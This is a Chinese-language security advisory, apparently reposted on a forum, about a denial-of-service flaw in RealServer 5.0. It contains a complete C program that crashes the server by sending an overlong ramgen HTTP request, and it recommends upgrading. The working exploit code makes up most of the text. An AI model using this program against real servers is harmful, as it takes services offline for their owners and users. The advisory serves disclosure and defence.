RealServer 5.0 ramgen拒绝服务漏洞
受影响的系统: Real Networks Real Server 5.0
不受影响系统: Real Networks Real Server 7.0
Real Networks Real Server G2 1.0
- Microsoft Windows NT 4.0
描述:
发送大于4082个字节的ramgen请求到RealServer 5.0,可以造成RealServer
5.0崩溃。通过重新启动RealServer软件可以恢复正常功能。
测试程序:
警 告:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自
负!
/*
* rmscrash.c - [email protected]
*
* Crash a RealMedia 5.0 server by sending a very long ramgen reque
st.
*
* Test on:
* $ pnserver -v
* Version: 5.0-rvserver-build-290
* Platform: FreeBSD-2.1.x
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define BUFLEN 4082
char buf[BUFLEN+14];
int sock;
struct sockaddr_in sa;
struct hostent *hp;
void main (int argc, char *argv[]) {
int i, port;
if (argc < 3) {
printf("Usage: %s realserver port\n",argv[0]);
exit(-1);
}
port = atoi(argv[2]);
memset(buf,0x41,BUFLEN);
memcpy(buf,"GET /ramgen/",12);
memcpy(buf+BUFLEN," HTTP/1.1\r\n\r\n", 13);
if ((hp=(struct hostent *)gethostbyname(argv[1]))==NULL) {
perror("gethostbyname()");
exit(0);
}
if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
perror("socket()");
exit(0);
}
sa.sin_family=AF_INET;
sa.sin_port=htons(port);
memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length);
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) {
perror("connect()");
exit(0);
}
printf("Connected to %s. Sending data\n",argv[1]);
write(sock,buf,strlen(buf));
printf("Done.\n");
close(sock);
exit(0);
}
建议:
升级到RealServer G2 or 7.0
--
欢迎大家常来回合策略 宗教信仰坐坐。
欢迎光临魔法师学院http://wwwmagic.126.com
* * * * *
无挂碍故无有恐怖
--DOS--
※ 来源:.网易虚拟社区北京站 http://bj.netease.com.[FROM: 202.106.248.250]
|
|